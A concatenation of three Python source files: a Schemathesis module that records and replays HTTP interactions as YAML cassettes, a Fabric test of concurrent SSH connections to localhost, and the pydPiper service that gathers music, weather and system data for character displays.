self.worker = threading.Thread(target=worker, kwargs={"file_handle": self.file_handle, "queue": self.queue})
self.worker.start()
def handle_event(self, context: ExecutionContext, event: events.ExecutionEvent) -> None:
if isinstance(event, events.Initialized):
# In the beginning we write metadata and start `http_interactions` list
self.queue.put(Initialize())
if isinstance(event, events.AfterExecution):
# Seed is always present at this point, the original Optional[int] type is there because `TestResult`
# instance is created before `seed` is generated on the hypothesis side
seed = cast(int, event.result.seed)
self.queue.put(
Process(
seed=seed,
interactions=event.result.interactions,
)
)
if isinstance(event, events.Finished):
self.shutdown()
def shutdown(self) -> None:
self.queue.put(Finalize())
self._stop_worker()
def _stop_worker(self) -> None:
self.worker.join(WRITER_WORKER_JOIN_TIMEOUT)
@attr.s(slots=True) # pragma: no mutate
class Initialize:
"""Start up, the first message to make preparations before proceeding the input data."""
@attr.s(slots=True) # pragma: no mutate
class Process:
"""A new chunk of data should be processed."""
seed: int = attr.ib() # pragma: no mutate
interactions: List[SerializedInteraction] = attr.ib() # pragma: no mutate
@attr.s(slots=True) # pragma: no mutate
class Finalize:
"""The work is done and there will be no more messages to process."""
def get_command_representation() -> str:
"""Get how Schemathesis was run."""
# It is supposed to be executed from Schemathesis CLI, not via Click's `command.invoke`
if not sys.argv[0].endswith("schemathesis"):
return "<unknown entrypoint>"
args = " ".join(sys.argv[1:])
return f"schemathesis {args}"
def worker(file_handle: click.utils.LazyFile, queue: Queue) -> None:
"""Write YAML to a file in an incremental manner.
This implementation doesn't use the `pyyaml` package and composes YAML manually as strings for the following reasons:
- It is much faster. The string-based approach gives only ~2.5% time overhead when `yaml.CDumper` has ~11.2%;
- Implementation complexity. We have a quite simple format where all values are strings, and it is much simpler to
implement it with string composition rather than with adjusting `yaml.Serializer` to emit explicit types.
Another point is that with `pyyaml` we need to emit events and handle some low-level details like providing
tags and anchors to get incremental writing; with strings it is much simpler.
"""
current_id = 1
stream = file_handle.open()
def format_header_values(values: List[str]) -> str:
return "\n".join(f" - {json.dumps(v)}" for v in values)
def format_headers(headers: Dict[str, List[str]]) -> str:
return "\n".join(f" {name}:\n{format_header_values(values)}" for name, values in headers.items())
def format_check_message(message: Optional[str]) -> str:
return "~" if message is None else f"{repr(message)}"
def format_checks(checks: List[SerializedCheck]) -> str:
return "\n".join(
f" - name: '{check.name}'\n status: '{check.value.name.upper()}'\n message: {format_check_message(check.message)}"
for check in checks
)
def format_request_body(request: Request) -> str:
if request.body is not None:
return f""" body:
encoding: 'utf-8'
base64_string: '{request.body}'"""
return ""
def format_response_body(response: Response) -> str:
if response.body is not None:
return f""" body:
encoding: '{response.encoding}'
base64_string: '{response.body}'"""
return ""
while True:
item = queue.get()
if isinstance(item, Initialize):
stream.write(
f"""command: '{get_command_representation()}'
recorded_with: 'Schemathesis {constants.__version__}'
http_interactions:"""
)
elif isinstance(item, Process):
for interaction in item.interactions:
status = interaction.status.name.upper()
stream.write(
f"""\n- id: '{current_id}'
status: '{status}'
seed: '{item.seed}'
elapsed: '{interaction.response.elapsed}'
recorded_at: '{interaction.recorded_at}'
checks:
{format_checks(interaction.checks)}
request:
uri: '{interaction.request.uri}'
method: '{interaction.request.method}'
headers:
{format_headers(interaction.request.headers)}
{format_request_body(interaction.request)}
response:
status:
code: '{interaction.response.status_code}'
message: {json.dumps(interaction.response.message)}
headers:
{format_headers(interaction.response.headers)}
{format_response_body(interaction.response)}
http_version: '{interaction.response.http_version}'"""
)
current_id += 1
else:
break
file_handle.close()
@attr.s(slots=True) # pragma: no mutate
class Replayed:
interaction: Dict[str, Any] = attr.ib() # pragma: no mutate
response: requests.Response = attr.ib() # pragma: no mutate
def replay(
cassette: Dict[str, Any],
id_: Optional[str] = None,
status: Optional[str] = None,
uri: Optional[str] = None,
method: Optional[str] = None,
request_tls_verify: bool = True,
request_cert: Optional[RequestCert] = None,
) -> Generator[Replayed, None, None]:
"""Replay saved interactions."""
session = requests.Session()
session.verify = request_tls_verify
session.cert = request_cert
for interaction in filter_cassette(cassette["http_interactions"], id_, status, uri, method):
request = get_prepared_request(interaction["request"])
response = session.send(request) # type: ignore
yield Replayed(interaction, response)
def filter_cassette(
interactions: List[Dict[str, Any]],
id_: Optional[str] = None,
status: Optional[str] = None,
uri: Optional[str] = None,
method: Optional[str] = None,
) -> Iterator[Dict[str, Any]]:
filters = []
def id_filter(item: Dict[str, Any]) -> bool:
return item["id"] == id_
def status_filter(item: Dict[str, Any]) -> bool:
status_ = cast(str, status)
return item["status"].upper() == status_.upper()
def uri_filter(item: Dict[str, Any]) -> bool:
uri_ = cast(str, uri)
return bool(re.search(uri_, item["request"]["uri"]))
def method_filter(item: Dict[str, Any]) -> bool:
method_ = cast(str, method)
return bool(re.search(method_, item["request"]["method"]))
if id_ is not None:
filters.append(id_filter)
if status is not None:
filters.append(status_filter)
if uri is not None:
filters.append(uri_filter)
if method is not None:
filters.append(method_filter)
def is_match(interaction: Dict[str, Any]) -> bool:
return all(filter_(interaction) for filter_ in filters)
return filter(is_match, interactions)
def get_prepared_request(data: Dict[str, Any]) -> requests.PreparedRequest:
"""Create a `requests.PreparedRequest` from a serialized one."""
prepared = requests.PreparedRequest()
prepared.method = data["method"]
prepared.url = data["uri"]
prepared._cookies = RequestsCookieJar() # type: ignore
if "body" in data:
encoded = data["body"]["base64_string"]
if encoded:
prepared.body = base64.b64decode(encoded)
# Request headers are serialized with a single value per header, so take the first element
headers = [(key, value[0]) for key, value in data["headers"].items()]
prepared.headers = CaseInsensitiveDict(headers)
return prepared
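# Illustrative usage (hypothetical file name and filter value; the cassette must
# first be parsed into a dict, e.g. with yaml.safe_load):
#
#   import yaml
#   with open("cassette.yaml") as fd:
#       cassette = yaml.safe_load(fd)
#   for replayed in replay(cassette, status="FAILURE"):
#       print(replayed.interaction["id"], replayed.response.status_code)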
|
concurrency.py
|
import codecs
from invoke.vendor.six.moves.queue import Queue
from invoke.vendor.six.moves import zip_longest
from invoke.util import ExceptionHandlingThread
from pytest import skip
from fabric import Connection
_words = "/usr/share/dict/words"
def _worker(queue, cxn, start, num_words, count, expected):
tail = num_words - start
cmd = "tail -n {} {} | head -n {}".format(tail, _words, count)
stdout = cxn.run(cmd, hide=True).stdout
result = [x.strip() for x in stdout.splitlines()]
queue.put((cxn, result, expected))
class concurrency:
# TODO: still useful to use Group API here? Where does this responsibility
# fall between Group and Executor (e.g. phrasing this specifically as a
# generic subcase of Invoke level task parameterization)?
# TODO: spin up multiple temp SSHDs / Paramiko servers / ???
def setup(self):
cxn1 = Connection("localhost")
cxn2 = Connection("localhost")
cxn3 = Connection("localhost")
self.cxns = (cxn1, cxn2, cxn3)
def connections_objects_do_not_share_connection_state(self):
cxn1, cxn2, cxn3 = self.cxns
[x.open() for x in self.cxns]
# Prove no exterior connection caching, socket reuse, etc
# NOTE: would phrase these as chained 'is not' but pep8 linter is being
# stupid :(
assert cxn1 is not cxn2
assert cxn2 is not cxn3
assert cxn1.client is not cxn2.client
assert cxn2.client is not cxn3.client
ports = [x.transport.sock.getsockname()[1] for x in self.cxns]
assert ports[0] is not ports[1] is not ports[2]
def manual_threading_works_okay(self):
# TODO: needs https://github.com/pyinvoke/invoke/issues/438 fixed
# before it will reliably pass
skip()
# Kind of silly but a nice base case for "how would someone thread this
# stuff; and are there any bizarre gotchas lurking in default
# config/context/connection state?"
# Specifically, cut up the local (usually 100k's long) words dict into
# per-thread chunks, then read those chunks via shell command, as a
# crummy "make sure each thread isn't polluting things like stored
# stdout" sanity test
queue = Queue()
# TODO: skip test on Windows or find suitable alternative file
with codecs.open(_words, encoding="utf-8") as fd:
data = [x.strip() for x in fd.readlines()]
threads = []
num_words = len(data)
chunksize = len(data) // len(self.cxns)  # floor division keeps slice indices as ints
for i, cxn in enumerate(self.cxns):
start = i * chunksize
end = max([start + chunksize, num_words])
chunk = data[start:end]
kwargs = dict(
queue=queue,
cxn=cxn,
start=start,
num_words=num_words,
count=len(chunk),
expected=chunk,
)
thread = ExceptionHandlingThread(target=_worker, kwargs=kwargs)
threads.append(thread)
for t in threads:
t.start()
for t in threads:
t.join(5) # Kinda slow, but hey, maybe the test runner is hot
while not queue.empty():
cxn, result, expected = queue.get(block=False)
for resultword, expectedword in zip_longest(result, expected):
err = u"({2!r}, {3!r}->{4!r}) {0!r} != {1!r}".format(
resultword, expectedword, cxn, expected[0], expected[-1]
)
assert resultword == expectedword, err
|
pydPiper.py
|
#!/usr/bin/python.pydPiper3
# coding: UTF-8
# pydPiper service to display music data to LCD and OLED character displays
# Written by: Ron Ritchey
# Edited by: Saiyato
import json, threading, logging, queue, time, sys, getopt, moment, signal, subprocess, os, copy, datetime, math, requests
import pages
import displays
import sources
import pydPiper_config
import pause
#try:
# import pyowm
#except ImportError:
# pass
exitapp = [ False ]
class music_controller(threading.Thread):
# Receives updates from music services
# Determines what page to display
# Sends relevant updates to display_controller
# musicdata variables.
# Includes all from musicdata class plus environmentals
musicdata_init = {
'state':"stop",
'musicdatasource':"",
'actPlayer':"",
'artist':"",
'title':"",
'album':"",
'uri':"",
'current':-1,
'elapsed':-1,
'remaining':"",
'total_time':"",
'duration':-1,
'length':-1,
'position':"",
'elapsed_formatted':"",
'elapsed_simple':"",
'volume':-1,
'repeat': 0,
'single': 0,
'random': 0,
'channels':0,
'bitdepth':"",
'bitrate':"",
'samplerate':"",
'type':"",
'tracktype':"",
'repeat_onoff': "Off",
'single_onoff': "Off",
'random_onoff': "Off",
'playlist_display':"",
'playlist_position':-1,
'playlist_count':-1,
'playlist_length':-1,
'current_tempc':0,
'current_tempf':0,
'disk_avail':0,
'disk_availp':0,
'current_time':"",
'utc':moment.utcnow(),
'localtime':moment.utcnow().timezone(pydPiper_config.TIMEZONE),
'current_time_sec':"",
'current_time_formatted':"",
'time_formatted':"",
'current_ip':"",
'outside_conditions':'No data',
'outside_temp_min':0,
'outside_temp_max':0,
'outside_temp_formatted':'',
'system_temp_formatted':''
}
def __init__(self, servicelist, display_controller, showupdates=False):
threading.Thread.__init__(self)
self.daemon = True
self.musicqueue = queue.Queue()
self.image = None
self.showupdates = showupdates
self.display_controller = display_controller
self.musicdata = copy.deepcopy(self.musicdata_init)
self.musicdata_prev = copy.deepcopy(self.musicdata)
self.servicelist = servicelist
self.services = { }
# Attempt to initialize services
self.initservices()
# Lock used to prevent simultaneous update of the musicdata dictionary
self.musicdata_lock = threading.Lock()
def initservices(self):
# Make sure that if rune (or volumio) is selected, it is the only service selected
if "rune" in self.servicelist and len(self.servicelist) > 1:
logging.critical("Rune service can only be used alone")
raise RuntimeError("Rune service can only be used alone")
if "volumio" in self.servicelist and len(self.servicelist) > 1:
logging.critical("Volumio service can only be used alone")
raise RuntimeError("Volumio service can only be used alone")
musicservice = None
for s in self.servicelist:
s = s.lower()
try:
if s == "mpd" or s == "moode":
musicservice = sources.musicdata_mpd.musicdata_mpd(self.musicqueue, pydPiper_config.MPD_SERVER, pydPiper_config.MPD_PORT, pydPiper_config.MPD_PASSWORD)
elif s == "spop":
musicservice = sources.musicdata_spop.musicdata_spop(self.musicqueue, pydPiper_config.SPOP_SERVER, pydPiper_config.SPOP_PORT, pydPiper_config.SPOP_PASSWORD)
elif s == "lms":
musicservice = sources.musicdata_lms.musicdata_lms(self.musicqueue, pydPiper_config.LMS_SERVER, pydPiper_config.LMS_PORT, pydPiper_config.LMS_USER, pydPiper_config.LMS_PASSWORD, pydPiper_config.LMS_PLAYER)
elif s == "rune":
musicservice = sources.musicdata_rune.musicdata_rune(self.musicqueue, pydPiper_config.RUNE_SERVER, pydPiper_config.RUNE_PORT, pydPiper_config.RUNE_PASSWORD)
elif s == "volumio":
musicservice = sources.musicdata_volumio2.musicdata_volumio2(self.musicqueue, pydPiper_config.VOLUMIO_SERVER, pydPiper_config.VOLUMIO_PORT, exitapp )
else:
logging.debug("Unsupported music service {0} requested".format(s))
continue
except NameError:
# Missing dependency for requested servicelist
logging.warning("Request for {0} failed due to missing dependencies".format(s))
pass
if musicservice != None:
self.services[s] = musicservice
if len(self.services) == 0:
logging.critical("No music services succeeded in initializing")
raise RuntimeError("No music services succeeded in initializing")
def launch_update_thread(self, func):
sv_t = threading.Thread(target=func)
sv_t.daemon = True
sv_t.start()
def run(self):
logging.debug("Music Controller Starting")
self.launch_update_thread(self.updatesystemvars)
self.launch_update_thread(self.updateconditions)
self.launch_update_thread(self.updateforecast)
timesongstarted = 0
# Inform the system that we are starting up
with self.musicdata_lock:
self.musicdata_prev['state'] = ''
self.musicdata['state'] = 'starting'
self.starttime = time.time()
lastupdate = 0 # Initialize variable to be used to force updates every second regardless of the receipt of a source update
while not exitapp[0]:
updates = { }
# Check if we are starting up. If yes, update pages to display any start message.
if self.starttime + pydPiper_config.STARTUP_MSG_DURATION > time.time():
time.sleep(pydPiper_config.STARTUP_MSG_DURATION)
with self.musicdata_lock:
self.musicdata['state'] = 'stop'
continue
# Attempt to get an update from the queue
try:
updates = self.musicqueue.get_nowait()
self.musicqueue.task_done()
except queue.Empty:
pass
# Get current time
try:
utc = moment.utcnow()
localtime = moment.utcnow().timezone(pydPiper_config.TIMEZONE)
current_time_ampm = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%p").strip()
if pydPiper_config.TIME24HOUR == True:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%H:%M").strip()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%H:%M:%S").strip()
current_time_ampm = ''
else:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%-I:%M %p").strip()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%-I:%M:%S %p")
except ValueError:
# Don't know why but on exit, the moment code is occasionally throwing a ValueError
current_time = "00:00"
current_time_sec = "00:00:00"
current_time_ampm = ''
utc = None
localtime = None
with self.musicdata_lock:
# Update musicdata based upon received message
for item, value in updates.items():
self.musicdata[item] = value
# Update song timing variables
if 'elapsed' in updates:
self.musicdata['elapsed'] = self.musicdata['current'] = updates['elapsed']
timesongstarted = time.time() - self.musicdata['elapsed']
if self.musicdata['state'] == 'play':
if 'elapsed' not in updates:
if timesongstarted > 0:
self.musicdata['elapsed'] = int(time.time() - timesongstarted)
else:
# We got here without timesongstarted being set which is a problem...
logging.debug("Trying to update current song position with an uninitialized start time")
# If the value of current has changed then update the other related timing variables
if self.musicdata['elapsed'] != self.musicdata_prev['elapsed']:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata['elapsed']))
timepos_advanced = timepos
total_time = "00:00"
if self.musicdata['length'] > 0:
timepos_advanced = time.strftime("%-M:%S", time.gmtime(self.musicdata['elapsed'])) + "/" + time.strftime("%-M:%S", time.gmtime(self.musicdata['length']))
remaining = time.strftime("%-M:%S", time.gmtime(self.musicdata['length'] - self.musicdata['elapsed'] ) )
total_time = time.strftime("%-M:%S", time.gmtime(self.musicdata['length']))
else:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata['elapsed']))
remaining = timepos
self.musicdata[u'elapsed_formatted'] = timepos_advanced
self.musicdata['remaining'] = remaining
self.musicdata[u'elapsed_simple'] = self.musicdata[u'position'] = timepos
self.musicdata[u'total_time'] = total_time
# Update onoff variables (random, single, repeat)
self.musicdata['random_onoff'] = "On" if self.musicdata['random'] else "Off"
self.musicdata['single_onoff'] = "On" if self.musicdata['single'] else "Off"
self.musicdata['repeat_onoff'] = "On" if self.musicdata['repeat'] else "Off"
# update time variables
self.musicdata['utc'] = utc
self.musicdata['localtime'] = localtime
self.musicdata['time'] = current_time
self.musicdata['time_ampm'] = current_time_ampm
# note: 'time_formatted' is computed during page processing as it needs the value of the strftime key contained on the line being displayed
# For backwards compatibility
self.musicdata['current_time'] = current_time
self.musicdata['current_time_sec'] = current_time_sec
# If anything has changed, update pages ### probably unnecessary to check this now that time is being updated in this section
if self.musicdata != self.musicdata_prev or lastupdate < time.time():
# Set lastupdate time to 1 second in the future
lastupdate = time.time()+1
self.musicdata['time_formatted'] = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime('%H:%M').strip()
# To support previous key used for this purpose
self.musicdata['current_time_formatted'] = self.musicdata['time_formatted']
# Update display controller
# The primary call to this routine is in main but this call is needed to catch variable changes before musicdata_prev is updated.
next(self.display_controller)
# Print the current contents of musicdata if showupdates is True
if self.showupdates:
# Check to see if a variable has changed (except time variables)
shouldshowupdate = False
for item, value in self.musicdata.items():
try:
if item in ['utc', 'localtime', 'time', 'time_ampm', 'current_time', 'current_time_sec']:
continue
if self.musicdata_prev[item] != value:
shouldshowupdate = True
break
except KeyError:
shouldshowupdate = True
break
if shouldshowupdate:
ctime = current_time
print(("Status at time {0}".ctime))
with self.musicdata_lock:
for item,value in self.musicdata.items():
try:
print((" [{0}]={1} {2}".format(item,repr(value), type(value))))
except:
print ("err")
print(("[{0}] =".format(item)))
print((type(value)))
print((repr(value)))
print ("\n")
# Update musicdata_prev
with self.musicdata_lock:
for item, value in self.musicdata.items():
try:
if self.musicdata_prev[item] != value:
self.musicdata_prev[item] = value
except KeyError:
self.musicdata_prev[item] = value
# Update display data every 1/4 second
time.sleep(.25)
def checkweatherconfiguration(self):
if not pydPiper_config.WEATHER_SERVICE:
logging.debug('Weather service not enabled')
return False
if pydPiper_config.WEATHER_SERVICE not in ['wunderground', 'accuweather', 'weerlive']:
logging.warning('{0} is not a valid weather service'.format(pydPiper_config.WEATHER_SERVICE))
return False
if not pydPiper_config.WEATHER_API:
logging.warning('Weather service requires an API key. Weather services will not be available until one is provided')
return False
if not pydPiper_config.WEATHER_LOCATION:
logging.warning('Weather service requires that a location be specified. Weather services will not be available until one is provided')
return False
return True
def checkaccuweatherreturn(self, status_code, querystr=''):
if status_code == 400:
logging.warning('Request had bad syntax or the parameters supplied were invalid. Request was [{0}]'.format(querystr))
elif status_code == 401:
logging.warning('Unauthorized. API authorization failed. API key is [{0}]'.format(pydPiper_config.WEATHER_API))
elif status_code == 403:
logging.warning('Unauthorized. You do not have permission to access this endpoint')
elif status_code == 404:
logging.warning('Server has not found a route matching the given URI. Request was [{0}]'.format(querystr))
elif status_code == 500:
logging.warning('Server encountered an unexpected condition which prevented it from fulfilling the request. Request was [{0}]'.format(querystr))
elif status_code == 200:
return True
else:
logging.warning('An unexpected return value was provided. Value was [{0}]. Request was [{1}]'.format(status_code,querystr))
return False
def updateforecast(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather forecast update process. Forecasts will update every 12 hours at noon and midnight')
while not exitapp[0]:
updateFlag = False
logging.debug('Requesting weather forecast from {0}'.format(pydPiper_config.WEATHER_SERVICE))
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
querystr = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API, })
if self.checkaccuweatherreturn(r.status_code, querystr):
try:
res = r.json()
todaysForecast = res['DailyForecasts'][0]
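# AccuWeather may report either unit; normalize to Fahrenheit first, then convert to the configured unit (C = (F - 32) / 1.8)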
temp_max_f = todaysForecast['Temperature']['Maximum']['Value'] if todaysForecast['Temperature']['Maximum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Maximum']['Value']*1.8)+32,1)
temp_min_f = todaysForecast['Temperature']['Minimum']['Value'] if todaysForecast['Temperature']['Minimum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Minimum']['Value']*1.8)+32,1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_max_f-32)*0.55555556,1)
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_min_f-32)*0.55555556,1)
outside_temp_max_formatted = "{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = "{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = todaysForecast['Day']['IconPhrase']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Forecast calls for a high of {0}, a low of {1}. Condition is {2}'.format(outside_temp_max_formatted, outside_temp_min_formatted, outside_conditions))
with self.musicdata_lock:
self.musicdata['outside_temp_max'] = outside_temp_max
self.musicdata['outside_temp_min'] = outside_temp_min
self.musicdata['outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata['outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata['outside_conditions'] = outside_conditions
# Sleep until next update which occurs every half day
pause.sleepUntil(time.time()+pause.nextHalfday(60), exitapp)
def updateconditions(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather current conditions update process. Current conditions will update every hour')
while not exitapp[0]:
updateFlag = False
# If using accuweather, sample current condition data every hour
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
logging.debug('Requesting current conditions from {0}'.format(pydPiper_config.WEATHER_SERVICE))
querystr = 'http://dataservice.accuweather.com/currentconditions/v1/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API })
if self.checkaccuweatherreturn(r.status_code, querystr):
try:
res = r.json()
current_observation = res[0]
temp = current_observation['Temperature']['Imperial']['Value'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else current_observation['Temperature']['Metric']['Value']
temp_formatted = "{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata['outside_temp'] = temp
self.musicdata['outside_temp_formatted'] = temp_formatted
# If using Weather Underground, sample current and forecast condition data every hour
elif pydPiper_config.WEATHER_SERVICE == 'wunderground':
querystr = 'http://api.wunderground.com/api/' + pydPiper_config.WEATHER_API + '/geolookup/conditions/forecast/q/' + pydPiper_config.WEATHER_LOCATION + '.json'
r = requests.get(querystr)
if self.checkaccuweatherreturn(r.status_code, querystr):
try:
res = r.json()
if 'error' in res['response']:
logging.warning('Error occured retrieving forecast from Weather Underground. Problem type was [{0}]:[{1}]'.format(res['response']['error']['type'],res['response']['error']['description']))
else:
todaysForecast = res['forecast']['simpleforecast']['forecastday'][0]
currentObservation = res['current_observation']
temp = currentObservation['temp_f'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else currentObservation['temp_c']
temp_formatted = "{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
temp_max_f = round(float(todaysForecast['high']['fahrenheit']),1)
temp_min_f = round(float(todaysForecast['low']['fahrenheit']),1)
temp_max_c = round(float(todaysForecast['high']['celsius']),1)
temp_min_c = round(float(todaysForecast['low']['celsius']),1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_max_c
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_min_c
outside_temp_max_formatted = "{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = "{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = currentObservation['weather']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('Weather Underground provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata['outside_temp'] = temp
self.musicdata['outside_temp_formatted'] = temp_formatted
self.musicdata['outside_temp_max'] = outside_temp_max
self.musicdata['outside_temp_min'] = outside_temp_min
self.musicdata['outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata['outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata['outside_conditions'] = outside_conditions
# If using weerlive.nl, sample current condition data every hour
elif pydPiper_config.WEATHER_SERVICE == 'weerlive':
logging.debug('Requesting current conditions from {0}'.format(pydPiper_config.WEATHER_SERVICE))
querystr = 'http://weerlive.nl/api/json-data-10min.php?key=' + pydPiper_config.WEATHER_API + '&locatie=' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr)
if self.checkaccuweatherreturn(r.status_code, querystr):
try:
res = r.json()
temp = res['liveweer'][0]['temp']
temp_formatted = "{0}°{1}".format(int(float(temp)),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
temp_max_f = round((float(res['liveweer'][0]['d0tmax'])*1.8)+32,1)
temp_min_f = round((float(res['liveweer'][0]['d0tmin'])*1.8)+32,1)
temp_max_c = float(res['liveweer'][0]['d0tmax'])
temp_min_c = float(res['liveweer'][0]['d0tmin'])
outside = pydPiper_config.WEATHER_OUTSIDE
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_max_c
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_min_c
outside_temp_max_formatted = "{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = "{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = res['liveweer'][0]['samenv']
updateFlag = True
except (KeyError, IndexError, ValueError) as e:
logging.warning('weerlive.nl provided a response in an unexpected format. Received [{0}]'.format(res))
logging.warning(e)
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata['outside_temp'] = temp
self.musicdata['outside_temp_formatted'] = temp_formatted
self.musicdata['outside_temp_max'] = outside_temp_max
self.musicdata['outside_temp_min'] = outside_temp_min
self.musicdata['outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata['outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata['outside_conditions'] = outside_conditions
# Sleep until next update which occurs every hour
pause.sleepUntil(time.time()+pause.nextHour(60), exitapp)
def updatesystemvars(self):
logging.debug('Initializing current system status update process. System status will update every five minutes')
while not exitapp[0]:
current_ip = subprocess.getoutput("ip -4 route get 1 | head -1 | cut -d' ' -f8 | tr -d '\n'").strip()
try:
with open("/sys/class/thermal/thermal_zone0/temp") as file:
system_tempc = int(file.read())
# Convert value to float and correct decimal place
system_tempc = round(float(system_tempc) / 1000,1)
# convert to fahrenheit
system_tempf = round(system_tempc*9/5+32,1)
except (IOError, OSError, AttributeError):
system_tempc = 0.0
system_tempf = 0.0
try:
if pydPiper_config.TEMPERATURE.lower() == 'celsius':
system_temp = system_tempc
system_temp_formatted = "{0}°c".format(int(system_temp))
else:
system_temp = system_tempf
system_temp_formatted = "{0}°f".format(int(system_temp))
except:
system_temp = system_tempf
system_temp_formatted = "{0}°f".format(int(system_temp))
try:
# Check if running on OSX. If yes, adjust df command
with os.popen('cat /etc/os-release') as p:
releaseName = p.readline()
if sys.platform == "darwin":
with os.popen("df /") as p:
p = os.popen("df /")
line = p.readline()
line = p.readline()
va = line.split()
line = "{0} {1}".format(va[3], va[4])
va = line.split()
avail = int(va[3])
usedp = int(va[4][:-1]) # Remove trailing % and convert to int
used = int(va[2])
availp = 100-usedp
elif releaseName[6:12] == 'Alpine':
with os.popen("df /") as p:
p = os.popen("df -B 1 /")
line = p.readline()
line = p.readline()
line = p.readline()
va = line.split()
avail = int(va[2])
usedp = int(va[3][:-1]) # Remove trailing % and convert to int
used = int(va[1])
availp = 100-usedp
else:
# assume running on Raspberry linux
with os.popen("df -B 1 /") as p:
line = p.readline()
line = p.readline().strip()
va = line.split()
avail = int(va[3])
usedp = int(va[4][:-1]) # Remove trailing % and convert to int
used = int(va[2])
availp = 100-usedp
except (IndexError, ValueError, AttributeError):
avail = 0
availp = 0
usedp = 0
used = 0
logging.debug('System status: Temp {0}, Disk space remaining {1}%, IP address {2}'.format(system_temp_formatted, availp, current_ip))
with self.musicdata_lock:
self.musicdata['system_temp'] = system_temp
self.musicdata['system_temp_formatted'] = system_temp_formatted
self.musicdata['system_tempc'] = system_tempc
self.musicdata['system_tempf'] = system_tempf
# For backward compatibility
self.musicdata['current_tempc'] = self.musicdata['system_tempc']
self.musicdata['current_tempf'] = self.musicdata['system_tempf']
self.musicdata['disk_avail'] = avail
self.musicdata['disk_availp'] = availp
self.musicdata['disk_used'] = used
self.musicdata['disk_usedp'] = usedp
self.musicdata['ip'] = current_ip
# For backwards compatibility
self.musicdata['current_ip'] = current_ip
# Sleep until next update which occurs every five minutes
pause.sleepUntil(time.time()+300, exitapp)
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
if __name__ == '__main__':
import math
signal.signal(signal.SIGTERM, sigterm_handler)
# Changing the system encoding should no longer be needed
# if sys.stdout.encoding != u'UTF-8':
# sys.stdout = codecs.getwriter(u'utf-8')(sys.stdout, u'strict')
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename=pydPiper_config.LOGFILE, level=pydPiper_config.LOGLEVEL)
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger('socketIO-client').setLevel(logging.WARNING)
# Move unhandled exception messages to log file
def handleuncaughtexceptions(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
